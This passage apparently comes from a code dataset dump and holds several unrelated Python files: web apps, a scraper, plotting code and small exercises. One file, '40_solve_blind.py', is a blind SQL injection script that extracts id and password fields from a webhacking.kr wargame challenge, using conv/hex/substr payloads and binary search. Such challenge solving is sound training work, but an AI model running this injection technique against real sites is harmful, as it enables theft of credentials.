movie = request.form['rated-movie']\n rating = request.form['rating']\n return render_template(\"rating-confirmation.html\", movie = movie, rating = rating)\n\n@app.route(\"/crossoff\", methods=['POST'])\ndef crossoff_movie():\n crossed_off_movie = request.form['crossed-off-movie']\n\n if crossed_off_movie not in get_current_watchlist():\n # The user tried to cross off a movie that isn't in their list.\n # so we redirect back to the front page and tell them what went wrong.\n error = \"'{0}' is not in your watchlist, so you can't cross it off!\".format(crossed_off_movie)\n\n # Redirect to homepage, and include error as a query parameter in the URL\n return redirect(\"/?error=\" + error)\n\n # If we didn't redirect by now, then all is well.\n return render_template('crossoff.html', crossed_off_movie = crossed_off_movie)\n\n@app.route(\"/add\", methods=['POST'])\ndef add_movie():\n # Look inside the request to figure out what the user typed.\n new_movie = request.form['new-movie']\n\n # If the user typed nothing at all, redirect and tell them the error.\n if (not new_movie) or (new_movie.strip() == \"\"):\n error = \"Please specify the movie you want to add.\"\n return redirect(\"/?error=\" + error)\n\n # If the user wants to add a terrible movie, redirect and tell them the error\n if new_movie in terrible_movies:\n error = \"Trust me, you don't want to add '{0}' to your watchlist.\".format(new_movie)\n return redirect(\"/?error=\" + error)\n\n # 'Escape' the user's input so that if they typed HTML, it doesn't mess up our site\n new_movie_escaped = cgi.escape(new_movie, quote = True)\n\n return render_template('add-confirmation.html', movie = new_movie)\n\n@app.route(\"/\")\ndef index():\n encoded_error = request.args.get(\"error\")\n return render_template('edit.html', watchlist = get_current_watchlist(), error = encoded_error and cgi.escape(encoded_error, quote = True))\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"472143313","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport shutil\nimport collections\nimport urllib.parse\n\n\nclass InvalidFileFormatException(Exception):\n pass\n\n\nWordEntry = collections.namedtuple(\"WordEntry\", \"word definition examples file_addr\")\n\n\ndef load_words():\n words = []\n\n russian_text_pattern = r\"\"\"([\\.\\,\\-\\_\\'\\\"\\@\\?\\!\\:\\;\\w\\/\\\\ ]+)\"\"\"\n\n word_pattern = russian_text_pattern\n definition_pattern = russian_text_pattern\n example_pattern = russian_text_pattern\n\n definition_pattern = re.compile(definition_pattern, re.VERBOSE)\n\n dir = 'words'\n for basename in os.listdir(dir):\n filename = os.path.join(dir, basename)\n if not os.path.isfile(filename):\n print('Skipping non-file \"%s\"' % filename)\n continue\n\n with open(filename) as inp:\n word_line = inp.readline().strip()\n\n word_match = re.match(word_pattern, word_line)\n if not word_match:\n raise InvalidFileFormatException()\n word = word_match.group(1)\n\n # skip separator line\n inp.readline()\n\n definition_line = inp.readline().strip()\n\n definition_match = re.match(definition_pattern, definition_line)\n if not definition_match:\n raise InvalidFileFormatException()\n definition = definition_match.group(1)\n\n # skip separator line\n inp.readline()\n\n examples = []\n for example_line in inp:\n example_match = re.match(example_pattern, example_line)\n if not example_match:\n raise InvalidFileFormatException\n\n examples.append(example_match.group(1))\n\n file_addr = \"https://github.com/Azatik1000/russian-it-dict/blob/master/\" \\\n + urllib.parse.quote(filename)\n\n words.append(WordEntry(word=word, definition=definition, examples=examples, file_addr=file_addr))\n\n words.sort(key=lambda wordEntry: wordEntry.word)\n return words\n\n\ndef write_words(wordEntries, outp):\n for wordEntry in wordEntries:\n examples_str = \"\"\n for i, example in enumerate(wordEntry.examples):\n examples_str += f\"{i + 1}. {example} \"\n\n outp.write(f'| {wordEntry.word} | {wordEntry.definition} | {examples_str} | [Тык]({wordEntry.file_addr}) |\\n')\n\n\ndef update_readme(words):\n shutil.copyfile(\"readme_header.md\", \"README.md\")\n\n with open('README.md', 'a', encoding='UTF-8') as outp:\n write_words(words, outp)\n\n\ndef main():\n words = load_words()\n update_readme(words)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"update_readme.py","file_name":"update_readme.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"272379725","text":"import sys\nimport requests\nimport time\n\n\nurl = \"http://webhacking.kr/challenge/web/web-29/index.php\"\ncookies = {'PHPSESSID':'9d83454b9b99c52d5941f936dfcf1445'}\npayload = {'no':'', 'id':'guest', 'pw':'guest'}\n\n\ndef brute_initial(col):\n sql = \"9||conv(hex(substr({column},{pos},1)),16,10){opr}{val}\"\n print(\"[-brute_initial-] \" + sql.format(column=col, pos='i', val='val', opr='='))\n initials = []\n for i in range(256):\n payload['no'] = sql.format(column=col, pos=1, val=i, opr='=')\n print(payload['no'])\n r = requests.get(url, cookies=cookies, params=payload)\n if r.text.find('Failure') == -1:\n print(\" ***** HIT first char : \" + chr(i))\n initials.append(chr(i))\n \n return initials\n \n\n\ndef bin_search(col):\n sql = \"9||no=2&&conv(hex(substr({column},{pos},1)),16,10){opr}{val}\"\n print(\"[-binary_search-] \" + sql.format(column=col, pos='i', val='val', opr='>'))\n answer = ''\n for i in range(1, 36):\n low = 0\n high = 255\n while high >= low:\n mid = low + ((high - low) // 2)\n payload['no'] = sql.format(column=col, pos=i, val=mid, opr='>')\n print(\"[*] \" + payload['no'])\n r = requests.get(url, cookies=cookies, params=payload)\n if r.text.find('admin') != -1:\n low = mid\n elif r.text.find('Failure') != -1:\n high = mid\n else:\n print(\"!!!!!!! neither T/F !!!!!!!\\n\")\n print(r.text)\n break\n \n if high == low+1:\n answer += chr(high)\n print(answer)\n break\n \n if high == 1:\n break\n\n return answer\n\n\n\nif __name__ == \"__main__\":\n # no = brute_initial('no')\n id_ = bin_search('id')\n pw = bin_search('pw')\n # print(\"id : {}\\npw : {}\\n\".format(id_, pw))\n \n \n ","sub_path":"hack/kr/40_solve_blind.py","file_name":"40_solve_blind.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488184922","text":"#!/usr/bin/python\n\n# import avango-guacamole\nimport avango\nimport avango.gua\nimport avango.script\nimport EdgeContainer\n\n# import python libraries\nimport math\n\n## GUILayer\n#\n# This class creates menus and \nclass Edge:\n\n def __init__(self, NAME, PARENT_NODE, START, END, THICKNESS, edge_functionality = None):\n self.PARENT_NODE = PARENT_NODE\n self.active = False\n self.highlight = False\n\n self.material = avango.gua.nodes.Material()\n self.material.set_uniform(\"Color\", avango.gua.Vec4(0.3,0.3,0.50, 1.0))\n\n self.highlight_material = avango.gua.nodes.Material()\n self.highlight_material.set_uniform(\"Color\", avango.gua.Vec4(0.9,0.1,0.1, 1.0))\n\n self.NAME = NAME\n self.START = START\n self.END = END\n self.THICKNESS = THICKNESS\n self.edge_functionality = None\n\n if edge_functionality != None:\n self.edge_functionality = edge_functionality\n\n self.id = EdgeContainer.edge_count\n EdgeContainer.edges.append(self)\n EdgeContainer.edge_count += 1\n \n\n _loader = avango.gua.nodes.TriMeshLoader()\n self.geometry = _loader.create_geometry_from_file(self.NAME, \"data/objects/cube.obj\",\n self.material, avango.gua.LoaderFlags.DEFAULTS | avango.gua.LoaderFlags.MAKE_PICKABLE) \n\n self.set_transform(START, END, THICKNESS)\n\n def execute(self, CROSSING_POINT):\n if self.active:\n if (self.edge_functionality != None):\n self.edge_functionality.execute(CROSSING_POINT)\n else:\n self.toggle_highlight()\n print(self.NAME,\" has no functionality\")\n\n def add_functionality(self, edge_functionality):\n self.edge_functionality = edge_functionality\n\n def get_start(self):\n _pos = self.PARENT_NODE.WorldTransform.value * avango.gua.make_trans_mat(self.start)\n return _pos.get_translate()\n\n def get_end(self):\n #_pos = self.geometry.Parent.value.WorldTransform.value.get_translate()\n #return _pos + self.end\n #return self.geometry.WorldTransform.value.get_translate() + self.end\n _pos = self.PARENT_NODE.WorldTransform.value * avango.gua.make_trans_mat(self.end)\n return _pos.get_translate()\n\n def set_material(self,R,G,B):\n _rgb = avango.gua.Vec3(R,G,B)\n _rgb.normalize()\n _color = avango.gua.Vec4(_rgb.x,_rgb.y,_rgb.z,1.0)\n\n self.material.set_uniform(\"Color\", _color)\n #self.material.set_uniform(\"Roughness\", random.random())\n #self.material.set_uniform(\"Metalness\", random.random())\n\n def toggle_activity(self):\n self.active = not self.active\n if self.geometry.Parent.value == None:\n self.active = False\n\n def set_activity(self,STATE):\n self.active = STATE\n if self.geometry.Parent.value == None:\n self.active = False\n\n def toggle_highlight(self):\n self.highlight = not self.highlight\n if self.highlight == True: # enable highlight\n self.geometry.Material.value = self.highlight_material\n else: # disable\n self.geometry.Material.value = self.material\n\n def set_highlight(self,FLAG):\n if FLAG == True: # enable highlight\n self.geometry.Material.value = self.highlight_material\n else: # disable\n self.geometry.Material.value = self.material\n self.highlight = FLAG\n\n def set_transform(self, START, END, thickness = None):\n self.start = START \n self.end = END \n if(thickness != None):\n self.THICKNESS = thickness\n \n _vec1 = avango.gua.Vec3(0.0,1.0,0.0)\n _vec2 = START - END\n\n _distance = _vec2.length()\n \n _vec1.normalize()\n _vec2.normalize()\n\n _axis = _vec1.cross(_vec2)\n _angle = math.degrees(math.acos(round(_vec1.dot( _vec2), 6)))\n\n _object_rotation_mat = avango.gua.make_rot_mat(_angle, _axis) \n _object_pos = (START + END) * 0.5 \n\n _mat = avango.gua.make_trans_mat(_object_pos) * _object_rotation_mat *\\\n avango.gua.make_scale_mat(self.THICKNESS, _distance, self.THICKNESS) #*\\\n #avango.gua.make_inverse_mat(avango.gua.make_scale_mat(self.PARENT_NODE.WorldTransform.value.get_scale()))\n self.geometry.Transform.value = _mat","sub_path":"Edge.py","file_name":"Edge.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"202942042","text":"import os\nimport sys\nimport unittest\n\nimport requests_mock\n\nfrom ... import reset_tweak_changes\n\npkg_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')) # noqa\nsys.path.insert(0, pkg_root) # noqa\n\nfrom hca import upload\nfrom .. import mock_current_upload_area, mock_upload_area\n\n\nclass TestUploadListArea(unittest.TestCase):\n\n @reset_tweak_changes\n def test_list_current_area(self):\n area = mock_current_upload_area()\n\n with requests_mock.mock() as m:\n mock_url = 'https://upload.test.data.humancellatlas.org/v1/area/{uuid}'.format(uuid=area.uuid)\n m.get(mock_url, text='{\"files\":[{\"some\":\"data\"}]}')\n\n file_list = upload.list_current_area()\n\n self.assertEqual(file_list, [{'some': 'data'}])\n\n @reset_tweak_changes\n def test_list_area(self):\n area1 = mock_upload_area()\n area2 = mock_upload_area()\n\n with requests_mock.mock() as m:\n area1_mock_url = 'https://upload.test.data.humancellatlas.org/v1/area/{uuid}'.format(uuid=area1.uuid)\n area2_mock_url = 'https://upload.test.data.humancellatlas.org/v1/area/{uuid}'.format(uuid=area2.uuid)\n m.get(area1_mock_url, text='{\"files\":[{\"area1\":\"file\"}]}')\n m.get(area2_mock_url, text='{\"files\":[{\"area2\":\"file\"}]}')\n\n file_list = upload.list_area(area1.uuid)\n\n self.assertEqual(file_list, [{'area1': 'file'}])\n","sub_path":"test/upload/python_bindings/test_list_area.py","file_name":"test_list_area.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166725212","text":"class Solution:\n def minFallingPathSum(self, A: 'List[List[int]]') -> 'int':\n n = len(A)\n dp = [A[-1]]\n for i in range(1, n):\n dp_row = []\n for j in range(n):\n choice = dp[i-1][j-1 if j>0 else 0:j+2 if j<n-1 else n]\n dp_row.append(A[n-i-1][j] + min(choice))\n dp.append(dp_row)\n return min(dp[-1])\n\n\nS = Solution()\nprint(\n S.minFallingPathSum(\n [[1,2,3],\n [4,5,6],\n [9,8,7]]\n )\n)","sub_path":"py3/Prob9/Prob931.py","file_name":"Prob931.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"302933071","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom itertools import zip_longest\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nimport re\nimport time\nfrom datetime import datetime\n\nfileOpen = \"csv/1.csv\"\nfileSave = 'csv_save/1.csv'\nclean = re.compile('<.*?>')\n\n\ndef parcing_data_max(datas):\n data_max = []\n for i in datas:\n if i != \"-\":\n string = i.replace('.', '/')\n data_max.append(datetime.strptime('{}'.format(string), '%d/%m/%Y'))\n\n return data_max\n\n\ndef findKC(datas, data_string_table):\n KC = []\n\n for v, i in enumerate(datas):\n\n print(datas)\n if i == \"-\":\n KC.append(\"NOT\")\n datas[v] = datas[v].replace(i, '777')\n\n for v, i in enumerate(data_string_table):\n for j in datas:\n if i == j:\n KC.append(data_string_table[v + 3])\n\n print(datas, \"dsdsdsds\", KC)\n return KC\n\n\ndef data_table(fp, datas, data_string_table, cadCost, cn, estateType, address):\n strTpWrite = \"\"\n print(datas, cadCost)\n date_max = parcing_data_max(datas) # Парсим дату, чтобы получить максимальное значение даты из списка\n maximum_data = \"\"\n mapa = dict(zip(datas, cadCost))\n if len(date_max) != 0:\n maximum_data = max(date_max) # Берем максимальную дату из списка\n KC = findKC(datas, data_string_table) # Забираем КС\n print(datas)\n print(KC)\n\n print(mapa)\n\n for v, i in enumerate(mapa):\n if i != \"-\":\n string = i.replace('.', '/')\n string = datetime.strptime('{}'.format(string), '%d/%m/%Y')\n if string == maximum_data:\n elementsToWrite = [cn, estateType, address, KC[v], mapa[i]]\n strTpWrite = \";\".join(elementsToWrite)\n print(strTpWrite)\n else:\n elementsToWrite = [cn, estateType, address, \"ОчереднаяГКО\", mapa[i]]\n strTpWrite = \";\".join(elementsToWrite)\n\n if not mapa:\n writen = [cn, estateType, address, \"NOT FOUND\", \"NOT FOUND\"]\n Write = \";\".join(writen)\n fp.write(Write + \"\\n\")\n else:\n fp.write(strTpWrite + \"\\n\")\n\n\ndef open_web(cn, estateType, address, soup):\n a, b, c = 0, 0, 0\n datas = []\n cadCost = []\n data_string_table = []\n with open(fileSave, 'a') as fp:\n for link in soup.find_all('div', attrs={'class': 'main_data'}):\n rows = link.find_all('tr', attrs={'class': 'tbody'})\n\n if a == 0:\n for data in rows:\n data = data.find('td', attrs={'class': 'table_row_align_center'})\n for i in data:\n string = ''.join(i.split())\n datas.append(string)\n a = 1\n if b == 0:\n for string_table in rows:\n string_table = string_table.find_all('td', attrs={'class': 'table_row_align_center'})\n for i in string_table:\n string = \"\\t\".join([str(x).strip() for x in i.contents])\n string = re.sub(clean, \"\\t\", string)\n string = ''.join(string.split())\n data_string_table.append(string)\n b = 1\n print(data_string_table)\n\n if c == 0:\n for many in rows:\n many = many.find_all('a', attrs={'class': 'cadcost'})\n for j in many:\n string = \"\\t\".join([str(x).strip() for x in j.contents])\n string = re.sub(clean, \"\\t\", string)\n string = ''.join(string.split())\n if string != \"-\":\n cadCost.append(string)\n c = 1\n\n data_table(fp, datas, data_string_table, cadCost, cn, estateType, address)\n\n\ndef main():\n nextiteration = []\n\n with open(fileOpen) as csvfile:\n for csvLine in csvfile:\n cn = csvLine[:csvLine.find(';')]\n with open(fileSave) as file:\n for csvLinesave in file:\n cn1 = csvLinesave[:csvLinesave.find(';')]\n if cn == cn1:\n nextiteration.append(csvLine)\n\n url = \"https://rosreestr.ru/wps/portal/p/cc_ib_portal_services/cc_ib_ais_fdgko\"\n\n with open(fileOpen) as csvfile:\n for csvLine in csvfile:\n cnt = 0\n\n for i in nextiteration:\n if i == csvLine:\n cnt = 1\n break\n\n if cnt == 1:\n continue\n\n cn, estateType, address = csvLine.split(\";\", 3)\n\n print(cn, estateType, address)\n\n address = address.rstrip()\n\n options = FirefoxOptions()\n options.add_argument(\"--headless\")\n options.headless = True\n driver = webdriver.Firefox('/home/rasha/Загрузки/geckodriver-v0.23.0-linux64', options=options)\n driver.implicitly_wait(10) # seconds\n driver.get(url)\n time.sleep(5)\n try:\n elem = WebDriverWait(driver, 60).until(\n EC.presence_of_element_located((By.NAME, \"search.searchString\"))\n )\n elem.send_keys(cn)\n\n button = driver.find_element_by_class_name(\"search_button\")\n button.click()\n except:\n driver.quit()\n time.sleep(5)\n\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n driver.quit()\n open_web(cn, estateType, address, soup)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"40456851","text":"#7.1 Write a program that prompts for a file name, then opens that file and reads through the file, and print the contents of the file in upper case. \n#Use the file words.txt to produce the output below.\n\n\n\n# Use words.txt as the file name\nfname = input(\"Enter file name: \")\nfh = open(fname)\nfor line in fh :\n line = line.rstrip() #we use rstrip to get rid of the empty space between the lines\n x = line.upper()\n print(x)\n","sub_path":"Week 3/Assignment 7.1.py","file_name":"Assignment 7.1.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"189785004","text":"'''\r\nFaça um programa que calcule o número médio de alunos por turma. Para isto, peça a quantidade de turmas e a quantidade de alunos para cada turma. As turmas não podem ter mais de 40 alunos.\r\n'''\r\n\r\n\r\nif __name__ == '__main__':\r\n quant_turma = int(input('Insira a quantidade de turmas: '))\r\n\r\n if quant_turma > 0:\r\n\r\n contador = 0\r\n somador = 0\r\n while contador < quant_turma:\r\n\r\n quant_aluno_turma = int(input('Insira a quantidade de alunos para a %sª turma: ' %(contador + 1)))\r\n\r\n if quant_aluno_turma > 0 and quant_aluno_turma <= 40:\r\n contador += 1\r\n somador += quant_aluno_turma\r\n else:\r\n print('Quantidade de alunos inválida, tente novamente')\r\n\r\n media = somador / contador\r\n print('A quantidade média de alunos por turma é igual a %s' %(media))\r\n\r\n else:\r\n print('Quantidade de turma insuficiente')\r\n","sub_path":"Lista de Exercícios/02 - Estrutura de repetição/ex027.py","file_name":"ex027.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"560012022","text":"class RouteTrieNode:\n def __init__(self, handler=None):\n self.handler = handler\n self.children = {}\n\n def insert(self, route):\n self.children[route] = RouteTrieNode()\n\n\nclass RouteTrie:\n def __init__(self):\n self.root = RouteTrieNode()\n\n def insert(self, paths, handler):\n current_node = self.root\n\n for path in paths:\n if path not in current_node.children:\n current_node.children[path] = RouteTrieNode()\n current_node = current_node.children[path]\n\n current_node.handler = handler\n\n def find(self, paths):\n current_node = self.root\n\n for path in paths:\n if path not in current_node.children:\n return None\n current_node = current_node.children[path]\n\n return current_node.handler\n\n\nclass Router:\n def __init__(self, handler, not_found_handler=\"404\"):\n self.routes = RouteTrie()\n self.routes.insert(\"/\", handler)\n self.not_found = not_found_handler\n\n def add_handler(self, route, handler):\n paths = self.split_path(route)\n self.routes.insert(paths, handler)\n\n def lookup(self, route):\n paths = self.split_path(route)\n return self.routes.find(paths) or self.not_found\n\n def split_path(self, route):\n if len(route) is 1:\n return [\"/\"]\n else:\n return route.strip(\"/\").split(\"/\")\n\n\n# create the router and add a route\nrouter = Router(\"root handler\", \"not found handler\")\nrouter.add_handler(\"/home/about\", \"about handler\")\n\nprint(router.lookup(\"/\"))\n# root handler\n\nprint(router.lookup(\"/home\"))\n# not found handler\n\nprint(router.lookup(\"/home/about\"))\n# about handler\n\nprint(router.lookup(\"/home/about/\"))\n# about handler\n\nprint(router.lookup(\"/home/about/me\"))\n# not found handler\n","sub_path":"P2/problem_7.py","file_name":"problem_7.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"621432813","text":"import json\nfrom elasticsearch_dsl.connections import connections\nfrom elasticsearch_dsl import Index, DocType, String, analyzer\n\nDATA_FILE='data/entities.jsonl'\nINDEX='entities'\nentities = Index('entities')\n\ndata_analyzer = analyzer('data_analyzer',\n tokenizer=\"standard\",\n filter=[\"standard\"]\n)\n\nclass Entity(DocType):\n name = String(index='not_analyzed')\n data = String(\n analyzer=data_analyzer,\n )\n\n class Meta:\n index = INDEX\n\ndef init():\n connect()\n delete_index()\n create_mappings()\n persist_data()\n health()\n\ndef connect():\n connections.create_connection(hosts=['localhost'])\n\ndef delete_index():\n # delete the index, ignore if it doesn't exist\n entities.delete(ignore=404)\n\ndef create_mappings():\n # create mappings in Elasticsearch\n Entity.init()\n\ndef persist_data(data_file = DATA_FILE):\n entities = load_entities()\n for index, entity in enumerate(entities):\n es_entity = Entity(meta={'id': index}, name=entity['name'], data=entity['data'])\n # save document into cluster\n es_entity.save()\n\ndef load_entities(data_file = DATA_FILE):\n with open(data_file, 'r') as fd:\n lines = fd.readlines()\n print(lines[0])\n return [json.loads(line) for line in lines]\n\ndef health():\n print(connections.get_connection().cluster.health())\n\nif __name__ == \"__main__\":\n init()\n","sub_path":"searchengine/persistence.py","file_name":"persistence.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275459952","text":"from graph.core import *\n\nfrom graph.load_xml import load_graph_types_and_instances\nfrom graph.save_xml import save_graph\nimport sys\nimport os\nimport math\n\n\nimport os\nappBase=os.path.dirname(os.path.realpath(__file__))\n\nsrc=appBase+\"/token_ring.xml\"\n(graphTypes,graphInstances)=load_graph_types_and_instances(src,src)\n\nn = 2 \n\ngraphType=graphTypes[\"token_ring\"]\ndevType=graphType.device_types[\"device\"]\n\ninstName=\"token_ring_{}_{}\".format(n,n)\nproperties={}\nres=GraphInstance(instName, graphType, properties)\nnodes={}\n\nfor i in range(0,n):\n sys.stderr.write(\" Device {}\\n\".format(i + 1))\n \n if initToken:\n devProps={\"hasInitToken\": 1}\n else:\n devProps={\"hasInitToken\": 0}\n \n di=DeviceInstance(res,\"n_{}\".format(i + 1), devType, devProps)\n nodes[i]=di\n res.add_device_instance(di)\n \ndef add_channel(s, d):\n dst=nodes[s]\n src=nodes[d]\n ei=EdgeInstance(res, d,\"in\", s,\"out\")\n res.add_edge_instance(ei)\n\n\nfor i in range(0,n):\n add_channel(i, (i + 1) % n)\n\nsave_graph(res,sys.stdout) \n","sub_path":"graph_schema-master/apps/token_ring/create_token_ring_instance.py","file_name":"create_token_ring_instance.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444665846","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nUniversidade de Lisboa\nFaculdade de Ciências\nDepartamento de Informática\nLicenciatura em Tecnologias da Informação\n2015/2016\n\nProgramação II\n\nProjeto de programação:\nCrime numa grande cidade\n\"\"\"\n\n__author__ = \"Pedro Fernandes, 456597, Andre Gonçalvez,46577\"\n\nimport time\nimport datetime\nimport csv\n#import pylab\nimport numpy as np\nimport matplotlib.pyplot as pylab\n\nfrom math import radians, cos, sin, asin, sqrt,pi\n\ndef crimes(nome_ficheiro):\n \"\"\"\n Esta função recebe o nome de um ficheiro como parâmetro e traça uma figura com quatro gráficos,\n Requires: Nome_ficheiro ser um ficheiro CSV\n Ensures: Figura com quatro graficos \n \"\"\"\n \n dados = dados_crimes(nome_ficheiro)\n\n traca_crimes_por_data(dados[0])\n traca_crimes_por_hora(dados[1])\n traca_crimes_por_tipo(dados[2])\n traca_crimes_por_distancia(dados[3])\n\n pylab.show()\n\n\ndef traca_crimes_por_data(grafico):\n \"\"\"\n Função que recebe uma tabela e constroi um grafico\n Requires: grafico é uma tabela (tuplo com duas listas, uma das abcissas, outra das ordenadas)\n Ensures: Um grafico \n \"\"\"\n pylab.subplot(2,2,1)\n pylab.title('Numero de crimes por dia')\n pylab.xlabel('Anos')\n pylab.ylabel('#Crimes')\n pylab.xticks(map(lambda x: x + 0 / 2.0, range(len(grafico[0]))), grafico[0])\n pylab.plot(range(len(grafico[1])),grafico[1])\n## pylab.xlim([2011, 2016])\n \ndef traca_crimes_por_hora(grafico):\n \"\"\"\n Função que recebe uma tabela e constroi um grafico\n Requires: grafico é uma tabela (tuplo com duas listas, uma das abcissas, outra das ordenadas)\n Ensures: Um grafico \n \"\"\"\n pylab.subplot(2,2,2)\n pylab.title('Numero de crimes por hora')\n pylab.xlabel('Horas')\n pylab.ylabel('#Crimes')\n \n ordenadas = grafico[1]\n abcissas = range(len(ordenadas))\n largura = 1\n etiquetas=grafico[0]\n pylab.xticks(map(lambda x: x + largura / 2.0, abcissas), etiquetas)\n pylab.bar(abcissas, ordenadas, largura, color='blue')\n \ndef traca_crimes_por_tipo(grafico):\n \"\"\"\n Função que recebe uma tabela e constroi um grafico\n Requires: grafico é uma tabela (tuplo com duas listas, uma das abcissas, outra das ordenadas)\n Ensures: Um grafico \n \"\"\"\n pylab.subplot(2,2,3)\n pylab.title('Numero de crimes por tipo')\n pylab.xlabel('Anos')\n pylab.ylabel('#Crimes') \n \n ordenadas = grafico[1]\n abcissas = range(len(ordenadas))\n largura = 1\n etiquetas=grafico[0]\n pylab.xticks(map(lambda x: x + largura / 2.0, abcissas), etiquetas,rotation='vertical')\n pylab.bar(abcissas, ordenadas, largura, color='blue')\n \ndef traca_crimes_por_distancia(grafico):\n \"\"\"\n Função que recebe uma tabela e constroi um grafico\n Requires: grafico é uma tabela (tuplo com duas listas, uma das abcissas, outra das ordenadas)\n Ensures: Um grafico \n \"\"\"\n pylab.subplot(2,2,4)\n pylab.title('Numero de crimes por distancia ao centro')\n pylab.xlabel('Distancia(x 100m)')\n pylab.ylabel('#Crimes por km2')\n abcissas = range(len(grafico[0]))\n ordenadas = (map(lambda x: x, grafico[1]))\n pylab.plot(abcissas ,ordenadas)\n pylab.xlim([0,100])\n\n\ndef crimes_por_data(tabela):\n \"\"\"\n Função que organiza e contabiliza o numero de ocorrencias de crimes por data. Eixo dos XX representado por uma escala de anos.\n Requires: Lista de dicionarios\n Ensures: Par de listas, abcissas e ordenadas\n \"\"\"\n crimeData = [] \n incidents = [] \n abcissa = [] #contêm as datas dos crimes por ordem crescente\n ordenadas = [] #contêm o número de crimes que ocorreram em cada data\n lista = []\n data_ord = [] \n l = []\n for crime in tabela:\n crimeData.append(crime[\"CrimeDate\"])\n incidents.append(crime[\"Total Incidents\"])\n\n \n for dates in crimeData:\n d = dates.split(\"/\")\n if len(d) > 0:\n d[0],d[1] = d[1],d[0]\n lista.append(d)\n \n for s in lista:\n data_ord.append(\"/\".join(s))\n data_ordenada = sorted(data_ord, key=lambda x: datetime.datetime.strptime(x, '%d/%m/%Y'))\n \n for data in data_ordenada:\n data_ordenada1 = data.split(\"/\")\n data_ordenada1.reverse()\n abcissa.append(\"\".join(data_ordenada1))\n #print abcissa\n \n abcis = list(set(abcissa))\n abcissas = sorted(abcis, key=lambda x: datetime.datetime.strptime(x, '%Y%m%d'))\n for i in abcissas:\n ordenadas.append(abcissa.count(i))\n if i[0:4] not in l:\n l.append(str(i[0:4]))\n return l,ordenadas\n \ndef crimes_por_hora(tabela):\n \"\"\"\n Função que organiza e contabiliza o numero de ocorrencias de crimes por hora\n Requires: Lista de dicionários\n Ensures: Par de listas abcissas e ordenadas\n \"\"\"\n crimeTime = []\n abcissas = []\n ordenadas = []\n \n for tempo in tabela:\n crimeTime.append(tempo['CrimeTime'][:2])\n #crimeTime-> horas onde houve crimes\n \n \n for i in range(24):\n if i < 10:\n abcissas.append(\"0\"+str(i))\n ordenadas.append(crimeTime.count(\"0\"+str(i)))\n else:\n abcissas.append(str(i))\n # abcissas->lista com 24 string['00',...,'23']\n ordenadas.append(crimeTime.count(str(i)))\n return abcissas,ordenadas\n\ndef crimes_por_tipo(tabela):\n \"\"\"\n Função que organiza e contabiliza o numero de ocorrencias por tipo de crime\n Requires: lista de dicionários\n Ensures: Par de listas abcissas e ordenadas\n \"\"\"\n tipo = []\n ordenadas = []\n for crime in tabela:\n tipo.append(crime['Description'])\n abcissas = list(set(tipo))\n #print tipo\n #print abcissas\n\n for i in abcissas:\n ordenadas.append(tipo.count(i))\n return abcissas,ordenadas\n\ndef crimes_por_distancia(tabela):\n \"\"\"\n Função que contabiliza o numero de crimes por distancia ao centro(definido na funcao) de uma cidade.\n Requires: tabela é uma lista de dicionários\n Ensures: Par de listas abcissas e ordenadas\n \"\"\"\n #lat1 e lon1 --> coordenadas Location1\n #lat2 e lon2 --> coordenadas Centro\n \n location = []\n distancia = []\n abcissas = []\n ordenadas = []\n for crime in tabela:\n location.append(crime['Location 1'][1:-1])\n for coord in location:\n if len(coord) > 0:\n coords = coord.split(', ')\n distancia.append(int(haversine(float(coords[0]),float(coords[1]),39.289444,-76.616667)/100))\n abcis = list(set(distancia))\n abcissas = sorted(abcis)\n## for i in abcissas:\n## cnt=distancia.count(i)\n## ordenadas.append(round(cnt/((pi*0.32)-(pi*0.22))))\n \n ordenadas = map(lambda x:round(distancia.count(x)/((pi*0.32)-(pi*0.22))),abcissas)\n return abcissas,ordenadas\n\n\n\ndef haversine(lat1, lon1, lat2, lon2):\n \"\"\"\n Returns the great circle distance between two GPS points given in degrees.\n See:\n http://stackoverflow.com/questions/4913349/haversine-formula-in-python-bearing-and-distance-between-two-gps-points\n http://www.movable-type.co.uk/scripts/latlong.html\n \"\"\"\n lat1, lat2, dlat, dlon = map(radians, [lat1, lat2, lat2 - lat1, lon2 - lon1])\n a = sin(dlat / 2.0) ** 